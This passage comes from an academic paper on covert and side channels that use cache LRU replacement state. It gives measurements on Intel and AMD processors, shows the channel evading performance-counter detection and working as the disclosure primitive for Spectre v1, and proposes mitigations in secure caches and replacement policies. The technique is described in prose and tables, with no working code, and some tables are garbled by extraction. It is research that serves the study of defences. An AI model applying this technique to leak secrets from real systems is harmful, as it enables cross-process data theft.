by the receiver when the sender is send-ing 0 and 1. The thresholds to decide whether a latencyrepresents hit and miss are selected such as to maximizethe diﬀerence between 0 and 1. As shown in Figure 8,when T r = 10 cycles, the receiver will receive about70% of L1 cache hits when the sender is sending 0, andabout 77% of L1 cache hits when the sender is sending1. This is enough to diﬀerentiate 0 and 1, by exam-ining if percentage of cache hit is below or above thethreshold. The transmission rate is about 0.2 bits persecond. When increasing T r , more interleaving betweenthe sender thread and the receiver thread happens dur-ing each measurement taken by the receiver, and thediﬀerence between 0 and 1 gets greater indicating lessnoise. The parameter d does not play a signiﬁcant role.We do not observe any signal using Algorithm 2 in time-sliced sharing, similar to the case for Intel. Table 4 compares the transmission rate per cacheset of the channels tested with diﬀerent conﬁgurations.Hyper-threading gives a much higher transmission ratethan time-sliced sharing because of more interferencebetween the sender and the receiver. Under hyper-threading, Algorithm 1 and Algorithm 2 have similartransmission rate. The transmission rate is compara-ble to other timing channels in caches [5, 7]. However,recall that Algorithm 2 is easily aﬀected by noise due The fact that the period does not equal to T s /T r indicatesthat threads do not get scheduled evenly. This might bedue to the Amazon EC2 platform, as we observe similarphenomenon on Intel processors on EC2. Table 4:

Transmission rate of the evaluated LRU channels.

Intel AMDHyper-Threaded

Algorithm 1 ∼ ∼ ∼ ∼ Time-Sliced

Algorithm 1 ∼ ∼ to activities of other programs, but the noise is easy toﬁlter, because the noise activity is usually of a diﬀer-ent frequency. The LRU channel on AMD processors isabout one order of magnitude slower than on Intel pro-cessors, due to the coarser-granularity of readout valueof timestamp counter and lower clock frequency.

6. STEALTHINESS OF LRU CHANNELS

In most of the existing cache side channels, the re-ceiver measures whether certain cache line exists in thecache directly. For example, in the Flush+Reload at-tack [2], the sender fetches a cache line into the cache,and the receiver measures directly whether a certaincache line is in the cache. To build a channel, the cachereplacement should happen due to the sender’s access.Meanwhile, in our LRU cache channel, the sender’s op-erations does not need to cause any cache replacements,because the LRU states are updated on both cache hitsand misses. Instead, the cache replacement happenswhen the receiver wants to measure the LRU state dur-ing the decoding phase. This makes the LRU channelmore stealthy on the sender’s side.Table 5 shows the encoding time of the sender. Theencoding times in the table include the time to calcu-late the victim address. For LRU channels, it is as-sumed that the victim line is already in the cache beforethe attack. The LRU channels are compared with theFlush+Reload channels. We implemented two variants,the one denoted by F+R (mem) uses clﬂush instructionto ﬂush the data all the way down to memory, whilethe on denoted by F+R (L1) uses eight accesses to theL1 cache set to evict the data from L1. As is shown inthe table, both LRU channels require less encoding timethan F+R channels. Because for the LRU channels, thesender can encode the message with cache hits, whilethe Flush+Reload channels always require the senderto have cache misses in the target cache level.Table 6 shows the cache miss rate of the sender pro-cess measured using Linux Perf tool from hardware per-formance counters . The results show that the senderof LRU Algorithm 1 and Algorithm 2 have smaller L1cache miss rate than the Flush+Reload. To provide abaseline of no attack, we also show the results whenthere is only the sender process running on the physicalcore (denoted by sender only ) and the results with thesender sharing the physical core with a benign gcc work-load (denoted by sender & gcc ). When there is only thesender process, it has the smallest L1 miss rate . When We do not have access to the hardware performance counteron AMD machines on Amazon AWS, so only result fromlocal Intel machines are shown in Table 6. The sender only case still has a relatively high L2 and LLCmiss rate due to fewer references to the L2 and LLC. able 5:

Latency of Encoding (cycles).

F+R(mem) F+R(L1) L1 LRU(Alg.1&2)Intel XeonE5-2690

336 35 31

Intel XeonE3-1245 v5

288 40 35

AMDEPYC 7571

232 56 52

Table 6:

Cache Miss Rate of the Sender Process.

F+R(mem) F+R(L1) L1 LRUAlg.1 L1 LRUAlg.2 sender& gcc senderonlyIntel XeonE5-2690

L1D 0.07% 0.04% 0.03% 0.03% 0.03% 0.01%L2 62% 6.67% 9.59% 15.6% 31% 8.32%LLC 88% 0.77% 0.71% 1.07% 61% 1.46%

Intel XeonE3-1245 v5

L1D 0.06% 0.02% 0.01% 0.01% 0.01% 0.00%L2 63% 11% 17% 14% 48% 26%LLC 92% 8.12% 8.15% 7.42% 70% 27%

Table 7:

Cache Miss Rate of Spectre V1 Attack.

F+R(mem) F+R(L1) L1 LRUAlg.1 L1 LRUAlg.2Intel XeonE5-2690

L1D 2.75% 4.73% 4.19% 4.75%L2 7.58% 0.07% 0.11% 0.09%LLC 98.15% 0.87% 0.72% 0.87%

Intel XeonE3-1245v5

L1D 2.86% 4.84% 4.13% 4.86%L2 7.39% 0.49% 0.71% 0.45%LLC 91.17% 1.83% 0.74% 0.96% it is sharing the core with a benign program, the be-nign program, e.g., the gcc , will cause contention in thecache, similar or even bigger to the contention due tothe receiver in the LRU channel. Hence, if a victimwants to detect a potential cache side channel attacksusing performance counters [46, 47, 48], the LRU chan-nel is diﬃcult to detect as it may not be distinguishedfrom the contention due to benign programs.

7. LRU CHANNELS IN TRANSIENT EXE-CUTION ATTACKS

Transient execution attacks, e.g., Spectre, leveragetransient execution to access secret and a covert channelto pass the secret to the attacker [20, 21, 22]. Currently,most proof-of-concept codes of transient execution at-tacks use the cache Flush+Reload covert channel. Herewe demonstrate that our LRU covert channel also workswith Spectre to retrieve the secret.Note that here the secret contains more than 1 bit,and multiple cache sets are used to encode the secret.In practice, 63 cache sets are used (both Intel and AMDprocessors tested have 64 sets, remaining one set is forthe 7 elements in the pointer chasing algorithm as dis-cussed in Section 4.4).The Flush+Reload covert channel needs one mem-ory access depending on the secret as the sender’s op-eration. Meanwhile, as shown in both algorithms inSection 4, the sender’s operation in the LRU channelsalso only need one memory access whose target set de-pends on the secret. Thus, the victim code using theLRU channel can be identical to the disclosure gadgetin the Flush+Reload channel. Thus, when demonstrat-ing transient execution attack using the LRU channels,we take the Spectre variant 1 attack sample code [20]and keep the victim (sender) code to be the same, andchange the attacker (receiver) code to use the L1 LRUchannels as the disclosure primitive instead. We areable to launch the Spectre attack using the LRU chan-nels (both Algorithm 1 and 2) to observe the secret.Also, Table 7 shows the cache miss rate (including boththe victim and the attacker) during a Spectre attack. !" !" ;41"(%&5+

Figure 9:

PL cache replacement logic ﬂow-chart. White boxesshow the original PL cache design in [27]. Blue boxes show thenew PL logic added in our simulation to defend the LRU attack.

Figure 10:

Simulation result of the LRU attack Algorithm 2 in gem5 with (top) original PL cache design and (bottom) new PLcache design which locks the LRU state to defend the LRU attack.

Comparing to the Flush+Reload channel, the advan-tage of the LRU disclosure primitive is the short en-coding time (i.e., the sender’s operations), and thus, asmaller speculative window is required, which may makethe attack more dangerous and harder to defend.

8. LRU ATTACK AND SECURE CACHES

Several designs have been proposed to defend the con-ventional and transient execution attacks, using parti-tioning or randomization. Some defenses of transientexecution attacks that stop the transient execution butleave the covert channel open, such as [49], are not thefocus of this paper.

Partitioning:

Many secure caches partition the cache(tag and data) between the victim and the attacker [26,27, 28, 29, 50], but the replacement policy is not con-sidered or speciﬁed.For example, in Partition-Locked (PL) cache [27],each cache line is extended with one lock bit. When acache line is locked, the line will not be evicted by anycache replacement until unlocking to protect the line, asshown in Figure 9. If a locked line is chosen as victimto be replaced, the replacement will not happen, andigure 11: (top) Cache miss rate of L1 Data cache and (bottom) normalized CPI when diﬀerent cache replacement policies (Tree-PLRU,FIFO, random) are used in the L1 Data cache. The results are normalized with the result of Tree-PLRU policy. the incoming line will be handled uncached. It is shownthat the PL cache can eﬀectively defend Flush+Reload,Prime+Probe, and other attacks.But the LRU state will still be updated on accesses tothe locked cache line, and the update will aﬀect the LRUstates of other lines. We implemented the PL cache us-ing PLRU replacement algorithm in the gem5 simulator,and tested the LRU attack. During the test, line N (theline accessed by the sender) is ﬁrst locked by the sender,and Algorithm 2 is used to build a channel . As shownin Figure 10 (top), with the original design, the receivercan still receive the secret by observing the time of ac-cessing line 0. This is because the sender’s access tothe locked line will change the eviction order of linesthat are not locked, which can be observed by the re-ceiver later. To mitigate the LRU channel, the LRUstate should be locked as well. We add the blue boxesin Figure 9 to PL cache design. In this way, the receiverwill always observe a cache hit, and thus not learn anyinformation, as shown in Figure 10 (bottom).Other work, such as DAWG [31], also proposes topartition the cache and the PLRU states in a cache setbetween protection domains. And the LRU channel canbe mitigated. We are unaware of any other designs thatpartition the LRU states, and secure cache designersneed to be careful to consider LRU based attacks.To mitigate transient execution cache side-channel at-tacks, InvisiSpec [35] proposes to only update micro-architectural states (including the LRU state) after theaccess is not speculative. So the LRU channels can-not be used in transient execution attacks, if InvisiSpecdefense is applied. Randomization:

Other secure cache designs userandomization. For example, Random ﬁll cache [32]decouple the access and the cache line brought into thecache, by fetching a random cache line instead of thecache line being accessed. However, if the cache lineis already in the cache, on a cache hit, the replace- Algorithm 1 is protected by PL cache when line 0 is locked.Because line 0 will not be evicted in the decoding phase, andthe receiver will always get a cache hit no matter what thesender is sending. ment state will still be updated, and the LRU channelcould still work. Meanwhile, some designs randomizethe mapping between the addresses and the cache sets,such as New cache, RP cache, or CEASER cache [27,33, 51]. So the receiver (and the sender) cannot mapthe addresses to the target cache set to build a channel.

9. DEFENDING THE LRU CHANNELS

The LRU timing-based channels leverage the fact thatthe sender and the receiver share the LRU states incaches. Thus, there could be several approaches to de-fend the LRU timing-based channels. Other than thesecure caches mentioned in Section 8, another mitiga-tion is to use another cache replacement policy insteadof LRU or PLRU. In this way, no more LRU state exists,and the channel is removed.

Random Replacement Policy:

Random replace-ment policy does not need any states in the cache. Ev-ery time a replacement is needed, a random cache wayin the cache set will be evicted. For simplicity, mostARM processors use a pseudo-random replacement pol-icy [52], and naturally defend the LRU attack.

FIFO Replacement Policy:

First-In First-Out (orRound-Robin) replacement policy selects the oldest cacheline that is fetched into the cache to be the victim.States are still required to store the history of cachelines fetched into cache. And thus, FIFO state stillcontains extra information than which cache line is pre-sented in the cache. However, diﬀerent from LRU, theFIFO states are only updated when a new cache lineis brought into the cache on cache misses. Thus, itwould require the sender to trigger a cache miss to letthe FIFO state be able to be observed by the receiver,similar to the existing cache channels.

Performance Evaluation of Random and FIFOPolicies:

LRU replacement policy is widely used inprocessors because of its performance. In this section,we evaluate the performance of diﬀerent replacementpolicies in the gem5 simulator [53]. We simulated a sin-gle out-of-order CPU core and a memory system with2-level caches (32KiB 4-way L1I, 64KiB 8-way L1D witha latency of 4 cycles, 2MiB 16-way L2 with a latencyf 8 cycles, and main memory latency of 50 ns). SPEC2006 int and ﬂoat benchmarks were tested [54]. Sincewe focus on the LRU channels in the L1 data cache, wetested diﬀerent replacement policies in L1 data cache.As shown in Figure 11 (top), compared to Tree-PLRU,the FIFO and Random replacement policies give smalldegradation on L1 data cache miss rate overall. De-pending on the benchmark, FIFO and Random replace-ment policy sometimes have an even lower cache missrate than Tree-PLRU. Since an L1 miss can still hit inL2, the overall CPU performance, indicated by cyclesper instruction (CPI) in Figure 11 (bottom), is onlychanged less than 2% compared to the baseline. Thus,using a diﬀerent replacement policy in the L1 data cacheto mitigate the LRU side and covert channel only givessmall overhead – while increasing security. Similarly,if the channels in all the levels of cache are to be miti-gated, the replacement policies of all the levels of cachesneed to be changed.

10. CONCLUSION

We presented novel timing-based channels leveragingthe cache LRU replacement states. We designed twoprotocols to transfer information between processes us-ing the LRU states for both cases when there is sharedmemory between the sender and the receiver and whenthere is no shared memory. We also demonstrated theLRU channels on real-world commercial processors. TheLRU channels require access (cache hit or miss) from thesender, while all the existing state-based timing-basedcache side and covert channels always need the sender totrigger a cache replacement (a cache miss). Thus, theLRU channel has shorter encoding time, lower cachemiss rate for the sender, and requires a smaller specula-tion window in transient attack scenarios. We show thenew LRU channels also aﬀect the current secure cachedesigns. In the end, we proposed several methods tomitigate the LRU channel and evaluated them, includ-ing a modiﬁed design of a secure PL cache.

Acknowledgement

We would like to thank the authors of InvisiSpec [35],especially Mengjia Yan, for their open-source code andscripts. Special thanks to Linbo Shao and Junwen Shaofor helping with gem5 simulation. We would like toacknowledge Amazon for providing AWS Cloud Cred-its for Research. This work was supported by NSF1651945 and 1813797, and through SRC award num-ber 2844.001.

11. REFERENCES [1] J. Szefer, “Survey of microarchitectural side and covertchannels, attacks, and defenses,”

Journal of Hardware andSystems Security , vol. 3, pp. 219–234, Sept. 2019.[2] Y. Yarom and K. Falkner, “FLUSH+ RELOAD: a highresolution, low noise, L3 cache side-channel attack,” in

USENIX Security Symposium (USENIX) , pp. 719–732,2014.[3] D. A. Osvik, A. Shamir, and E. Tromer, “Cache attacksand countermeasures: the case of AES,” in

Cryptographers’Track at the RSA Conference , pp. 1–20, 2006. [4] J. Bonneau and I. Mironov, “Cache-collision timing attacksagainst AES,” in

International Workshop on CryptographicHardware and Embedded Systems (CHES) , pp. 201–215,2006.[5] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee,“Last-level cache side-channel attacks are practical,” in

Symposium on Security and Privacy (S&P) , pp. 605–622,2015.[6] M. Yan, R. Sprabery, B. Gopireddy, C. Fletcher,R. Campbell, and J. Torrellas, “Attack directories, notcaches: Side channel attacks in a non-inclusive world,” in

Symposium on Security and Privacy (S&P) , 2019.[7] F. Yao, M. Doroslovacki, and G. Venkataramani, “AreCoherence Protocol States Vulnerable to InformationLeakage?,” in

International Symposium on HighPerformance Computer Architecture (HPCA) , pp. 168–179,2018.[8] Z. Wang and R. B. Lee, “Covert and side channels due toprocessor architecture,” in

Annual Computer SecurityApplications Conference (ACSAC) , pp. 473–482, 2006.[9] Y. Yarom, D. Genkin, and N. Heninger, “CacheBleed: atiming attack on OpenSSL constant-time RSA,”

Journal ofCryptographic Engineering , vol. 7, no. 2, pp. 99–112, 2017.[10] M. Schwarz, M. Schwarzl, M. Lipp, J. Masters, andD. Gruss, “Netspectre: Read arbitrary memory overnetwork,” in

European Symposium on Research inComputer Security (ESORICS) , pp. 279–299, 2019.[11] A. Moghimi, J. Wichelmann, T. Eisenbarth, and B. Sunar,“Memjam: A false dependency attack against constant-timecrypto implementations,”

International Journal of ParallelProgramming , vol. 47, no. 4, pp. 538–570, 2019.[12] A. C. Aldaya, B. B. Brumley, S. ul Hassan, C. P. Garc´ıa,and N. Tuveri, “Port contention for fun and proﬁt,” in

Symposium on Security and Privacy (S&P) , pp. 870–887,2019.[13] A. Bhattacharyya, A. Sandulescu, M. Neugschwandtner,A. Sorniotti, B. Falsaﬁ, M. Payer, and A. Kurmus,“SMoTherSpectre: exploiting speculative execution throughport contention,” arXiv preprint arXiv:1903.01843 , 2019.[14] D. Evtyushkin, R. Riley, N. C. Abu-Ghazaleh,D. Ponomarev, et al. , “Branchscope: A new side-channelattack on directional branch predictor,” in

ACM SIGPLANNotices , vol. 53, pp. 693–707, ACM, 2018.[15] D. Evtyushkin, D. Ponomarev, and N. Abu-Ghazaleh,“Jump over ASLR: Attacking branch predictors to bypassASLR,” in

International Symposium on Microarchitecture(MICRO) , p. 40, 2016.[16] D. Gullasch, E. Bangerter, and S. Krenn, “Cachegames–Bringing access-based cache attacks on AES topractice,” in

Symposium on Security and Privacy (S&P) ,pp. 490–505, 2011.[17] C. Percival, “Cache missing for fun and proﬁt,” 2005.[18] D. J. Bernstein, “Cache-timing attacks on AES,” 2005.[19] O. Acıi¸cmez and ¸C. K. Ko¸c, “Trace-driven cache attacks onAES (short paper),” in

International Conference onInformation and Communications Security , pp. 112–121,2006.[20] P. Kocher, J. Horn, A. Fogh, , D. Genkin, D. Gruss,W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher,M. Schwarz, and Y. Yarom, “Spectre Attacks: ExploitingSpeculative Execution,” in

Symposium on Security andPrivacy (S&P) , 2019.[21] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas,A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin,Y. Yarom, and M. Hamburg, “Meltdown: Reading KernelMemory from User Space,” in

USENIX SecuritySymposium (USENIX) , 2018.[22] C. Canella, J. Van Bulck, M. Schwarz, M. Lipp,B. Von Berg, P. Ortner, F. Piessens, D. Evtyushkin, andD. Gruss, “A systematic evaluation of transient executionattacks and defenses,” in

USENIX Security SymposiumUSENIX) , pp. 249–266, 2019.[23] K. So and R. N. Rechtschaﬀen, “Cache operations by MRUchange,”

IEEE Transactions on Computers , vol. 37, no. 6,pp. 700–709, 1988.[24] A. Malamy, R. N. Patel, and N. M. Hayes, “Methods andapparatus for implementing a pseudo-lru cache memoryreplacement scheme with a locking feature,” 1994. USPatent 5,353,425.[25] J. Nomani and J. Szefer, “Predicting program phases anddefending against side-channel attacks using hardwareperformance counters,” in

Workshop on Hardware Supportfor Security and Privacy (HASP) , June 2015.[26] R. B. Lee, P. Kwan, J. P. McGregor, J. Dwoskin, andZ. Wang, “Architecture for protecting critical secrets inmicroprocessors,” in

ACM SIGARCH ComputerArchitecture News , vol. 33, pp. 2–13, 2005.[27] Z. Wang and R. B. Lee, “New cache designs for thwartingsoftware cache-based side channel attacks,” in

ACMSIGARCH Computer Architecture News , vol. 35,pp. 494–505, 2007.[28] L. Domnitser, A. Jaleel, J. Loew, N. Abu-Ghazaleh, andD. Ponomarev, “Non-monopolizable caches:Low-complexity mitigation of cache side channel attacks,”

ACM Transactions on Architecture and Code Optimization(TACO) , vol. 8, no. 4, p. 35, 2012.[29] D. Zhang, A. Askarov, and A. C. Myers, “Language-basedcontrol and mitigation of timing channels,”

ACMSIGPLAN Notices , vol. 47, no. 6, pp. 99–110, 2012.[30] M. Yan, B. Gopireddy, T. Shull, and J. Torrellas, “SecureHierarchy-Aware Cache Replacement Policy (SHARP):Defending Against Cache-Based Side Channel Attacks,” in

Annual International Symposium on ComputerArchitecture (ISCA) , pp. 347–360, 2017.[31] V. Kiriansky, I. Lebedev, S. Amarasinghe, S. Devadas, andJ. Emer, “DAWG: A defense against cache timing attacksin speculative execution processors,” in

InternationalSymposium on Microarchitecture (MICRO) , pp. 974–987,2018.[32] F. Liu and R. B. Lee, “Random ﬁll cache architecture,” in

International Symposium on Microarchitecture (MICRO) ,pp. 203–215, 2014.[33] F. Liu, H. Wu, K. Mai, and R. B. Lee, “Newcache: Securecache architecture thwarting cache side-channel attacks,”

IEEE Micro , vol. 36, no. 5, pp. 8–16, 2016.[34] G. Keramidas, A. Antonopoulos, D. N. Serpanos, andS. Kaxiras, “Non deterministic caches: A simple andeﬀective defense against side channel attacks,”

DesignAutomation for Embedded Systems , vol. 12, no. 3,pp. 221–230, 2008.[35] M. Yan, J. Choi, D. Skarlatos, A. Morrison, C. Fletcher,and J. Torrellas, “InvisiSpec: Making SpeculativeExecution Invisible in the Cache Hierarchy,” in

International Symposium on Microarchitecture (MICRO) ,pp. 428–441, 2018.[36] K. N. Khasawneh, E. M. Koruyeh, C. Song, D. Evtyushkin,D. Ponomarev, and N. Abu-Ghazaleh, “Safespec: Banishingthe spectre of a meltdown with leakage-free speculation,” in

Design Automation Conference (DAC) , pp. 1–6, 2019.[37] A. Jaleel, K. B. Theobald, S. C. Steely Jr, and J. Emer,“High performance cache replacement using re-referenceinterval prediction (RRIP),” in

ACM SIGARCH ComputerArchitecture News , vol. 38, pp. 60–71, ACM, 2010.[38] M. K. Qureshi, A. Jaleel, Y. N. Patt, S. C. Steely, andJ. Emer, “Adaptive insertion policies for high performancecaching,”

ACM SIGARCH Computer Architecture News ,vol. 35, no. 2, pp. 381–391, 2007. [39] T. Ristenpart, E. Tromer, H. Shacham, and S. Savage,“Hey, you, get oﬀ of my cloud: exploring informationleakage in third-party compute clouds,” in

Conference onComputer and Communications Security (CCS) ,pp. 199–212, 2009.[40] Y. Zhang, A. Juels, M. K. Reiter, and T. Ristenpart,“Cross-tenant side-channel attacks in PaaS clouds,” in

Conference on Computer and Communications Security(CCS) , pp. 990–1003, 2014.[41] E. M. Koruyeh, K. N. Khasawneh, C. Song, andN. Abu-Ghazaleh, “Spectre returns! speculation attacksusing the return stack buﬀer,” in , 2018.[42] G. Maisuradze and C. Rossow, “ret2spec: Speculativeexecution using return stack buﬀers,” in

Conference onComputer and Communications Security (CCS) ,pp. 2109–2122, 2018.[43] S. Briongos, P. Malag´on, J. M. Moya, and T. Eisenbarth,“RELOAD+REFRESH: Abusing Cache ReplacementPolicies to Perform Stealthy Cache Attacks,” arXiv preprintarXiv:1904.06278 , 2019.[44] G. Navarro, “A guided tour to approximate stringmatching,”

ACM computing surveys (CSUR) , vol. 33,no. 1, pp. 31–88, 2001.[45]

Software Optimization Guide for AMD Family 17hProcessors . https://developer.amd.com/wordpress/media/2013/12/55723_SOG_Fam_17h_Processors_3.00.pdf ,accessed Feb. 2019.[46] T. Zhang, Y. Zhang, and R. B. Lee, “Cloudradar: Areal-time side-channel attack detection system in clouds,”in International Symposium on Research in Attacks,Intrusions, and Defenses (RAID) , pp. 118–140, 2016.[47] M. Chiappetta, E. Savas, and C. Yilmaz, “Real timedetection of cache-based side-channel attacks usinghardware performance counters,”

Applied Soft Computing ,vol. 49, pp. 1162–1174, 2016.[48] M. Alam, S. Bhattacharya, D. Mukhopadhyay, andS. Bhattacharya, “Performance Counters to Rescue: AMachine Learning based safeguard againstMicro-architectural Side-Channel-Attacks,”

IACRCryptology ePrint Archive , vol. 2017, p. 564, 2017.[49] M. Taram, A. Venkat, and D. Tullsen, “Context-sensitivefencing: Securing speculative execution via microcodecustomization,” in

International Conference onArchitectural Support for Programming Languages andOperating Systems (ASPLOS) , pp. 395–410, 2019.[50] V. Costan, I. Lebedev, and S. Devadas, “Sanctum: Minimalhardware extensions for strong software isolation,” in

USENIX Security Symposium (USENIX) , pp. 857–874,2016.[51] M. K. Qureshi, “CEASER: Mitigating Conﬂict-BasedCache Attacks via Encrypted-Address and Remapping,” in

International Symposium on Microarchitecture (MICRO) ,pp. 775–787, 2018.[52]

ARM1176JZF-S Technical Reference Manual . http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0301h/ch07s02s01.html , accessed Aug. 2019.[53] N. Binkert, B. Beckmann, G. Black, S. K. Reinhardt,A. Saidi, A. Basu, J. Hestness, D. R. Hower, T. Krishna,S. Sardashti, et al. , “The GEM5 simulator,” ACMSIGARCH Computer Architecture News , vol. 39, no. 2,pp. 1–7, 2011.[54] J. L. Henning, “SPEC CPU2006 benchmark descriptions,”